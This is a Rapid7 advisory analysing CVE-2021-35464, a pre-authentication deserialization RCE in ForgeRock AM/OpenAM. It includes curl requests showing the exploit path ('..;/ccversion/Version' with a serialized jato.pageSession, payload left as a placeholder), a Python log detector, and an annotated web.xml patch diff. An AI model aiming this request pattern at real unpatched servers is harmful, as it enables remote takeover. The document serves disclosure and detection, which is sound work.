Rapid7
Threat Research

Rapid7 Analysis: Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)

Last updated on Jun 16, 2026 | 12 min read

Threat status: Threat - we now have reliable private reports of exploitation in the wild.
Attacker utility: Remote code execution
Vulnerability class: Deserialization

Description

On Tuesday, June 29, 2021, PortSwigger security researcher Michael Stepankin published details on CVE-2021-35464, a pre-authentication remote code execution vulnerability in ForgeRock’s AM identity and access management solution. The vulnerability arises from a Java deserialization flaw in AM’s implementation of the JATO framework and can be triggered by a single GET or POST request to a vulnerable endpoint. Successful exploitation yields code execution on the target system, and public proofs-of-concept are readily available.

ForgeRock AM versions below 7.0 running on Java 8 are vulnerable, and the weakness also exists in unpatched versions of the Open Identity Platform’s OpenAM. ForgeRock/OIP installations running on Java 9 or higher are unaffected.

Affected products

AM 6.0.0.x
AM 6.5.0.x
AM 6.5.1
AM 6.5.2.x
AM 6.5.3

Guidance

According to ForgeRock’s advisory, the vendor was “actively working on patches” for existing versions of ForgeRock Access Manager as of June 29, 2021. Organizations must either upgrade to AM version 7 or above or apply one of the several workarounds the advisory describes; see the advisory for details.

Rapid7 analysis

We expect widespread exploitation to occur quickly. As of June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s AM solution. Rapid7 researchers could easily reproduce RCE against OpenAM using a touch /tmp/vulnerable payload:

wvu@kharak:~$ curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>"
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 7080 (#0)
> GET /openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object> HTTP/1.1
> Host: 127.0.0.1:7080
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 302
< X-Frame-Options: SAMEORIGIN
< Cache-Control: private
< Location: http://127.0.0.1:7080/openam/base/AMInvalidURL
< Content-Length: 0
< Date: Tue, 29 Jun 2021 15:59:35 GMT
<
* Connection #0 to host 127.0.0.1 left intact
* Closing connection 0
wvu@kharak:~$
openam@localhost:/tmp$ ls -l
total 8
drwxr-x--- 2 openam root 4096 Jun 29 15:50 hsperfdata_openam
drwxr-xr-x 1 root   root 4096 Jun 17 00:46 hsperfdata_root
-rw-r----- 1 openam root    0 Jun 29 15:59 vulnerable
openam@localhost:/tmp$

Sending the payload in a POST request also works:

curl -v "http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>
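As an added detection example (this is not Rapid7's or ForgeRock's code), the following Python scans access-log lines for the request shape used in both the GET and POST forms above. It assumes Common Log Format lines, which are constructed here, and infers from the PoC request that jato.pageSession is URL-safe base64 of a one-byte prefix followed by a Java serialization stream: the decoder looks for the 0xACED0005 magic and reads the root class name, which is java.util.PriorityQueue in the PoC.

```python
"""Flag CVE-2021-35464-style JATO deserialization probes in access-log lines."""
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC 0xACED, STREAM_VERSION 5
KNOWN_GADGET_ROOTS = {"java.util.PriorityQueue"}  # root class of the PoC gadget chain
JATO_ENDPOINT_SUFFIX = "/ccversion/Version"  # legacy JATO endpoint hit by the PoC
# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes.
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def decode_page_session(value: str) -> Optional[bytes]:
    """URL-decode then base64url-decode a jato.pageSession value; None if not base64."""
    s = unquote(value)
    s += "=" * (-len(s) % 4)  # the PoC value is transmitted without '=' padding
    try:
        return base64.urlsafe_b64decode(s)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def serialized_root_class(blob: bytes) -> Optional[str]:
    """Return the first class name if blob is a Java serialization stream, else None.

    Object streams begin TC_OBJECT 0x73, TC_CLASSDESC 0x72, u2 length, class name.
    The PoC value carries one 0x00 byte before the magic (assumption inferred from
    the request above), so the magic is searched for rather than required at offset 0.
    """
    idx = blob.find(JAVA_SERIAL_MAGIC, 0, 12)
    if idx < 0:
        return None
    pos = idx + len(JAVA_SERIAL_MAGIC)
    if blob[pos:pos + 2] != b"\x73\x72":
        return "<non-object stream>"
    length = int.from_bytes(blob[pos + 2:pos + 4], "big")
    return blob[pos + 4:pos + 4 + length].decode("utf-8", "replace")


def classify_request(method: str, target: str, status: str, body: str = "") -> List[str]:
    """Return the reasons a request looks like a CVE-2021-35464 probe ([] if none)."""
    reasons: List[str] = []
    parts = urlsplit(target)  # urlsplit keeps the '..;' path parameter intact
    path = unquote(parts.path)
    if "..;" in path:
        reasons.append("path-parameter traversal '..;' in request path")
    if path.endswith(JATO_ENDPOINT_SUFFIX):
        reasons.append("request to legacy JATO endpoint " + JATO_ENDPOINT_SUFFIX)
    # The parameter arrives in the query string (GET) or a form-encoded body (POST).
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    for value in params.get("jato.pageSession", []):
        blob = decode_page_session(value)
        root = serialized_root_class(blob) if blob is not None else None
        if root is None:
            continue
        reasons.append(f"jato.pageSession holds a Java serialization stream (root class {root})")
        if root in KNOWN_GADGET_ROOTS:
            reasons.append("root class is the gadget-chain entry point used by the public PoC")
    if reasons and status == "302":
        reasons.append("302 response is consistent with the AMInvalidURL redirect in the PoC session")
    return reasons


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify_request over CLF lines and return only the flagged requests."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF; note that POST bodies never appear in access logs
        client, when, method, target, status = m.groups()
        reasons = classify_request(method, target, status)
        if reasons:
            findings.append({"client": client, "time": when, "target": target, "reasons": reasons})
    return findings


def constructed_page_session() -> str:
    """Build a stand-in jato.pageSession with the PoC's framing but no gadget bytecode."""
    name = b"java.util.PriorityQueue"
    stream = b"\x00" + JAVA_SERIAL_MAGIC + b"\x73\x72" + len(name).to_bytes(2, "big") + name
    return base64.urlsafe_b64encode(stream).decode().rstrip("=")


# Constructed sample lines: one PoC-shaped probe, one normal XUI request, and one
# direct hit on the JATO endpoint whose parameter is not a serialized object.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jun/2021:15:59:35 +0000] "GET /openam/oauth2/..;/ccversion/Version'
    f'?jato.pageSession={constructed_page_session()} HTTP/1.1" 302 0',
    '10.0.0.9 - - [29/Jun/2021:16:01:02 +0000] "GET /openam/XUI/ HTTP/1.1" 200 1843',
    '10.0.0.7 - - [29/Jun/2021:16:03:11 +0000] "GET /openam/ccversion/Version'
    '?jato.pageSession=AAAA HTTP/1.1" 200 512',
]
```

Calling scan_log(SAMPLE_LOG) flags the first line with five reasons and the third with one (the endpoint alone), and leaves the XUI request untouched; pass a request body to classify_request to cover the POST form, which access logs alone cannot show.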

The ForgeRock AM “patch” (version 7) removes JATO and the legacy endpoints using it:

--- a/WEB-INF/web.xml
+++ b/WEB-INF/web.xml
@@ -45,88 +45,6 @@
     	<listener-class>org.forgerock.openam.identity.idm.AMIdentityRepositoryListenerInitializer</listener-class>
 	</listener>

-	<!-- context param -->
-	<context-param>
-    	<param-name>jato:enforceStrictSessionTimeout</param-name>
-    	<param-value>true</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.authentication.UI.*:moduleURL</param-name>
-    	<param-value>../UI</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:enforceStrictSessionTimeout1</param-name>
-    	<param-value>true</param-value>
-	</context-param>
-
-	<!-- Console context params -->
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.base.*:moduleURL</param-name>
-    	<param-value>../base</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.authentication.*:moduleURL</param-name>
-    	<param-value>../authentication</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.service.*:moduleURL</param-name>
-    	<param-value>../service</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.session.*:moduleURL</param-name>
-    	<param-value>../session</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.realm.*:moduleURL</param-name>
-    	<param-value>../realm</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.policy.*:moduleURL</param-name>
-    	<param-value>../policy</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.idm.*:moduleURL</param-name>
-    	<param-value>../idm</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.user.*:moduleURL</param-name>
-    	<param-value>../user</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.delegation.*:moduleURL</param-name>
-    	<param-value>../delegation</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.agentconfig.*:moduleURL</param-name>
-    	<param-value>../agentconfig</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.task.*:moduleURL</param-name>
-    	<param-value>../task</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.version.*:moduleURL</param-name>
-    	<param-value>../ccversion</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.federation.*:moduleURL</param-name>
-    	<param-value>../federation</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.webservices.*:moduleURL</param-name>
-    	<param-value>../webservices</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.sts.*:moduleURL</param-name>
-    	<param-value>../sts</param-value>
-	</context-param>
-	<context-param>
-    	<param-name>jato:com.sun.identity.console.audit.*:moduleURL</param-name>
-    	<param-value>../audit</param-value>
-	</context-param>
-
-	<!-- end console context param -->
-
 	<filter>
     	<filter-name>amSetupFilter</filter-name>
     	<filter-class>com.sun.identity.setup.AMSetupFilter</filter-class>
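Review bot: the `jato:com.sun.identity.console.version.*:moduleURL` to `../ccversion` mapping removed here is what routed the `/ccversion/Version` request in the PoC above; removing every `jato:` context param is the right scope, but deleting configuration alone does not prove the JATO servlet classes are gone from the WAR, and a stray context param in a deployment overlay could revive the endpoint. The change should be paired with removal of the JATO jar itself, and anyone verifying an upgraded deployment should confirm `/ccversion/Version` no longer resolves.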
@@ -141,6 +59,16 @@
         	<param-value>Server</param-value>
     	</init-param>
 	</filter>
+	<filter>
+    	<filter-name>SecureCookieFilter</filter-name>
+    	<filter-class>org.forgerock.openam.headers.SecureCookieFilter</filter-class>
+    	<async-supported>true</async-supported>
+    	<init-param>
+        	<!-- Add any cookies that should be excluded from upgrade to secure cookies here -->
+        	<param-name>excludes</param-name>
+        	<param-value></param-value>
+    	</init-param>
+	</filter>
 	<!--
 	To override the default User-Agent exclusion patterns for SameSite=none cookies, uncomment
 	the following filter definition and update the excluded patterns, one pattern per line -->
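Review bot: `excludes` for the new SecureCookieFilter is left empty, so every cookie is upgraded to Secure; that is the safe default, but the declaration has no `<filter-mapping>` in this hunk, and the mapping plus its ordering constraint relative to DisableSameSiteCookiesFilter only appear in a later hunk. A comment on the declaration pointing at that ordering constraint would keep the two halves from drifting apart in future edits.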
@@ -191,6 +119,18 @@
         	<param-value>nosniff</param-value>
     	</init-param>
 	</filter>
+	<filter>
+    	<filter-name>CachePrivate</filter-name>
+    	<filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
+    	<init-param>
+        	<param-name>Cache-Control</param-name>
+        	<param-value>private</param-value>
+    	</init-param>
+    	<init-param>
+        	<param-name>excludes</param-name>
+        	<param-value>/serverinfo/*,/serverinfo/version,/serverinfo/cookieDomains</param-value>
+    	</init-param>
+	</filter>
 	<filter>
     	<filter-name>CacheForFiveMinutes</filter-name>
     	<filter-class>org.forgerock.openam.headers.SetHeadersFilter</filter-class>
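Review bot: in the CachePrivate `excludes` value, `/serverinfo/*` already covers `/serverinfo/version` and `/serverinfo/cookieDomains`, so the two explicit entries are redundant unless SetHeadersFilter treats `*` literally; either drop them or add a comment stating the matcher's semantics. Excluding `/serverinfo/*` from `Cache-Control: private` also means those responses stay cacheable by shared caches, which is reasonable for public server metadata but deserves a one-line comment saying it is deliberate.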
@@ -210,73 +150,9 @@
     	</init-param>
     	<init-param>
         	<param-name>excludes</param-name>
-        	<param-value>/policyEditor/,/policyEditor/index.html,/scripts/,/scripts/index.html,/XUI/,/XUI/index.html</param-value>
+        	<param-value>/XUI/,/XUI/index.html,/ui-admin/,/ui-admin/index.html</param-value>
     	</init-param>
 	</filter>
-	<!-- To configure CORS Support, please see the documentation and use the following lines as a template.
-	<filter>
-    	<filter-name>CORSFilter</filter-name>
-    	<filter-class>org.forgerock.openam.cors.CORSFilter</filter-class>
-    	<init-param>
-        	<description>
-            	Accepted Methods (Required):
-            	A comma separated list of HTTP methods for which to accept CORS requests.
-        	</description>
-        	<param-name>methods</param-name>
-        	<param-value>POST,PUT</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Accepted Origins (Required):
-            	A comma separated list of origins from which to accept CORS requests.
-        	</description>
-        	<param-name>origins</param-name>
-        	<param-value>http://www.example.net,https://example.org:8433</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Allow Credentials (Optional):
-            	Whether to include the Vary (Origin) and Access-Control-Allow-Credentials headers in the response.
-            	Default: false
-        	</description>
-        	<param-name>allowCredentials</param-name>
-        	<param-value>false</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Allowed Headers (Optional):
-            	A comma separated list of HTTP headers which can be included in the requests.
-        	</description>
-        	<param-name>headers</param-name>
-        	<param-value>headerOne,headerTwo,headerThree</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Expected Hostname (Optional):
-            	The name of the host expected in the request Host header.
-        	</description>
-        	<param-name>expectedHostname</param-name>
-        	<param-value>openam.example.com:8080</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Exposed Headers (Optional):
-            	The comma separated list of headers which the user-agent can expose to its CORS client.
-        	</description>
-        	<param-name>exposeHeaders</param-name>
-        	<param-value>exposeHeaderOne,exposeHeaderTwo</param-value>
-    	</init-param>
-    	<init-param>
-        	<description>
-            	Maximum Cache Age (Optional):
-            	The maximum time that the CORS client can cache the pre-flight response, in seconds.
-            	Default: 600
-        	</description>
-        	<param-name>maxAge</param-name>
-        	<param-value>600</param-value>
-    	</init-param>
-	</filter>
-	-->
 	<filter>
     	<filter-name>AuditContextFilter</filter-name>
     	<filter-class>org.forgerock.openam.audit.context.AuditContextFilter</filter-class>
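Review bot: removing the commented-out CORSFilter template deletes the only in-file documentation of how CORS is configured; if configuration moved to the admin console or the product docs, a one-line comment pointing there would help operators who copied this template. The `excludes` change drops `/policyEditor/` and `/scripts/` and adds `/ui-admin/`, which implies those legacy UI paths no longer exist; that is consistent with the JATO removal but belongs in the change description rather than being inferred from a cache header exclusion list.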
@@ -308,9 +184,9 @@
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>

-	<!-- Access audit filter for JATO, Debug.jsp and ssoadm.jsp pages -->
+	<!-- Access audit filter for Debug.jsp and ssoadm.jsp pages -->
 	<filter>
-    	<filter-name>JatoAuditFilter</filter-name>
+    	<filter-name>DebugAuditFilter</filter-name>
     	<filter-class>org.forgerock.openam.audit.servlet.AuditAccessServletFilter</filter-class>
     	<init-param>
         	<param-name>auditing-component</param-name>
@@ -318,36 +194,12 @@
     	</init-param>
 	</filter>
 	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/service/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/federation/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/realm/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/agentconfig/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/sts/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/delegation/*</url-pattern>
+    	<filter-name>DebugAuditFilter</filter-name>
+    	<url-pattern>/Debug.jsp</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/idm/*</url-pattern>
-	</filter-mapping>
-	<filter-mapping>
-    	<filter-name>JatoAuditFilter</filter-name>
-    	<url-pattern>/Debug.jsp</url-pattern>
+    	<filter-name>DebugAuditFilter</filter-name>
+    	<url-pattern>/Logback.jsp</url-pattern>
 	</filter-mapping>
 	<filter>
     	<filter-name>SsoAdmJspAuditFilter</filter-name>
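Review bot: the audit mappings for `/service/*`, `/federation/*`, `/realm/*`, `/agentconfig/*`, `/sts/*`, `/delegation/*` and `/idm/*` are removed with JATO, so requests to those legacy console paths are no longer recorded by AM's access audit. If any of them still resolves after the upgrade (a forgotten JSP, a reverse-proxy rewrite), probing would be invisible to the audit log and appear only in the container's access logs; confirm they return 404 rather than relying on the mappings having been removed. Mapping `DebugAuditFilter` to `/Logback.jsp` alongside `/Debug.jsp` is a good addition.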
@@ -366,15 +218,13 @@
     	<filter-name>amSetupFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
-	<!--
 	<filter-mapping>
-    	<filter-name>CORSFilter</filter-name>
-    	<url-pattern>/json/*</url-pattern>
+    	<filter-name>FQDNValidationFilter</filter-name>
+    	<url-pattern>/XUI/*</url-pattern>
 	</filter-mapping>
-	-->
 	<filter-mapping>
     	<filter-name>FQDNValidationFilter</filter-name>
-    	<url-pattern>/XUI/*</url-pattern>
+    	<url-pattern>/ui-admin/*</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
     	<filter-name>FQDNValidationFilter</filter-name>
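Review bot: the diff presents the `/XUI/*` FQDNValidationFilter mapping as removed and re-added when only the commented-out CORSFilter mapping is actually deleted and `/ui-admin/*` is the new pattern; deleting the comment block and adding the `/ui-admin/*` mapping in place would make the net change obvious. A third FQDNValidationFilter mapping begins at the end of the hunk with its pattern out of view, so confirm it does not duplicate `/ui-admin/*`.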
@@ -402,14 +252,23 @@
     	<filter-name>NoSniffFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>CachePrivate</filter-name>
+    	<url-pattern>/json/*</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>ResponseValidationFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
 	<filter-mapping>
+    	<!-- The DisableSameSiteCookiesFilter should always come before the SecureCookieFilter -->
     	<filter-name>DisableSameSiteCookiesFilter</filter-name>
     	<url-pattern>/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>SecureCookieFilter</filter-name>
+    	<url-pattern>/*</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>CacheForFiveMinutes</filter-name>
     	<url-pattern>/XUI/index.html</url-pattern>
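Review bot: the ordering rule in the new comment (DisableSameSiteCookiesFilter before SecureCookieFilter) is enforced only by the position of the `<filter-mapping>` elements, since the container builds the chain in declaration order for mappings that match; placing the comment inside the DisableSameSiteCookiesFilter mapping rather than directly above the new SecureCookieFilter mapping makes an accidental reorder easy. Moving the comment to sit between the two mappings, or above both, would put the dependency where a future editor will see it.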
@@ -420,6 +279,10 @@
     	<url-pattern>/ui-admin/*</url-pattern>
     	<url-pattern>/XUI/*</url-pattern>
 	</filter-mapping>
+	<filter-mapping>
+    	<filter-name>CacheForFiveMinutes</filter-name>
+    	<url-pattern>/ui-admin/index.html</url-pattern>
+	</filter-mapping>
 	<filter-mapping>
     	<filter-name>NotificationsWebSocketFilter</filter-name>
     	<url-pattern>/notifications</url-pattern>
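Review bot: `/ui-admin/index.html` is now both a `url-pattern` for CacheForFiveMinutes and an entry in that filter's `excludes` list from the earlier hunk, mirroring the existing `/XUI/index.html` pair. If `excludes` in SetHeadersFilter means something other than "skip this path" (for example, exempting the path from a default no-store so the five-minute value applies), a comment on the filter declaration should say so; otherwise a future reader will see a mapping that is immediately excluded and "fix" it.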
@@ -445,10 +308,6 @@

 	<!-- listener declaration -->

-	<servlet>
-    	<servlet-name>LoginServlet</servlet-name>
-    	<servlet-class>com.sun.identity.authentication.UI.LoginServlet</servlet-class>
-	</servlet>
 	<servlet>
     	<servlet-name>setSetupProgress</servlet-name>
     	<servlet-class>com.sun.identity.setup.SetSetupProgress</servlet-class>
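Review bot: the `<!-- listener declaration -->` comment that heads this region labels servlet declarations, not listeners; since the hunk already edits these lines, correcting the comment would cost nothing. Removing `LoginServlet` (`com.sun.identity.authentication.UI.LoginServlet`) pairs with the `jato:com.sun.identity.authentication.UI.*:moduleURL` context param deleted in the first hunk, and its `/UI/*` mapping is removed in a later hunk, so nothing is left mapped to an undeclared servlet.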
@@ -528,121 +387,6 @@
     	<servlet-class>com.sun.identity.configuration.MonitoringFedConfigurator</servlet-class>
     	<load-on-startup>30</load-on-startup>
 	</servlet>
-	<servlet>
-    	<description>CDCServlet</description>
-    	<servlet-name>cdcservlet</servlet-name>
-    	<servlet-class>com.iplanet.services.cdc.CDCServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLAwareServlet</description>
-    	<servlet-name>SAMLAwareServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLAwareServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLPOSTProfileServlet</description>
-    	<servlet-name>SAMLPOSTProfileServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLPOSTProfileServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SAMLSOAPReceiver</description>
-    	<servlet-name>SAMLSOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.SAMLSOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>AssertionManagerServlet</description>
-    	<servlet-name>AssertionManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.saml.servlet.AssertionManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>FSAssertionManagerServlet</description>
-    	<servlet-name>FSAssertionManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.FSAssertionManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<description>SecurityTokenManagerServlet</description>
-    	<servlet-name>SecurityTokenManagerServlet</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.security.SecurityTokenManagerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>preLoginHandler</servlet-name>
-    	<servlet-class>com.sun.identity.federation.login.FSPreLoginHandler</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>postLoginHandler</servlet-name>
-    	<servlet-class>com.sun.identity.federation.login.FSPostLoginHandler</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessLogout</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSProcessLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnLogout</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSReturnLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SingleSignOnService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSSSOAndFedService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IntersiteTransferService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSIntersiteTransferService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>AssertionConsumerService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSAssertionConsumerService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>SOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.FSSOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>FederationTerminationServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationInitiationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessTermination</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationRequestServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnTermination</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.termination.FSTerminationReturnServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>InitiateRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationInitiationServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ProcessRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationRequestServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>ReturnRegistration</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.registration.FSRegistrationReturnServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>LogoutServlet</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.logout.FSSingleLogoutServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSSOAPReceiver</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.soapbinding.SOAPReceiver</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>WSPRedirectHandler</servlet-name>
-    	<servlet-class>com.sun.identity.liberty.ws.interaction.WSPRedirectHandlerServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>IDPFinderService</servlet-name>
-    	<servlet-class>com.sun.identity.federation.services.fednsso.FSIDPFinderService</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>idffwriter</servlet-name>
-    	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
-	</servlet>
-	<servlet>
-    	<servlet-name>idffreader</servlet-name>
-    	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieReaderServlet</servlet-class>
-	</servlet>
 	<servlet>
     	<servlet-name>saml2writer</servlet-name>
     	<servlet-class>com.sun.identity.saml2.idpdiscovery.CookieWriterServlet</servlet-class>
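Review bot: the servlets removed here (CDCServlet, the SAML 1.x servlets, the Liberty ID-FF login, logout, registration and termination handlers, the Liberty WS SOAP receiver and the ID-FF discovery cookie reader and writer) are not JATO components, so this hunk goes beyond the deserialization fix; deployments still using CDSSO via `cdcservlet` or SAML 1.x lose those endpoints on upgrade. The change description and the advisory should call this out as a separate functional removal so operators can plan a migration rather than discovering it from a 404.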
@@ -814,10 +558,6 @@
     	<servlet-name>LoginLogoutMapping</servlet-name>
     	<url-pattern>/logout</url-pattern>
 	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>LoginServlet</servlet-name>
-    	<url-pattern>/UI/*</url-pattern>
-	</servlet-mapping>
 	<servlet-mapping>
     	<servlet-name>AMSetupServlet</servlet-name>
     	<url-pattern>/config/configurator</url-pattern>
@@ -1025,114 +765,6 @@
     	<servlet-name>spsaehandler</servlet-name>
     	<url-pattern>/spsaehandler/*</url-pattern>
 	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>IDPFinderService</servlet-name>
-    	<url-pattern>/idpfinder</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>cdcservlet</servlet-name>
-    	<url-pattern>/cdcservlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLAwareServlet</servlet-name>
-    	<url-pattern>/SAMLAwareServlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLPOSTProfileServlet</servlet-name>
-    	<url-pattern>/SAMLPOSTProfileServlet</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SAMLSOAPReceiver</servlet-name>
-    	<url-pattern>/SAMLSOAPReceiver</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>AssertionManagerServlet</servlet-name>
-    	<url-pattern>/AssertionManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>FSAssertionManagerServlet</servlet-name>
-    	<url-pattern>/FSAssertionManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SecurityTokenManagerServlet</servlet-name>
-    	<url-pattern>/SecurityTokenManagerServlet/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>preLoginHandler</servlet-name>
-    	<url-pattern>/preLogin</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>postLoginHandler</servlet-name>
-    	<url-pattern>/postLogin/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ProcessLogout</servlet-name>
-    	<url-pattern>/ProcessLogout/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>ReturnLogout</servlet-name>
-    	<url-pattern>/ReturnLogout/*</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>LogoutServlet</servlet-name>
-    	<url-pattern>/liberty-logout</url-pattern>
-	</servlet-mapping>
-	<servlet-mapping>
-    	<servlet-name>SingleSignOnService</servlet-name>
-    	<url-pattern>/SingleSignOnService/*</url-pattern>
-	</servlet-mapping>
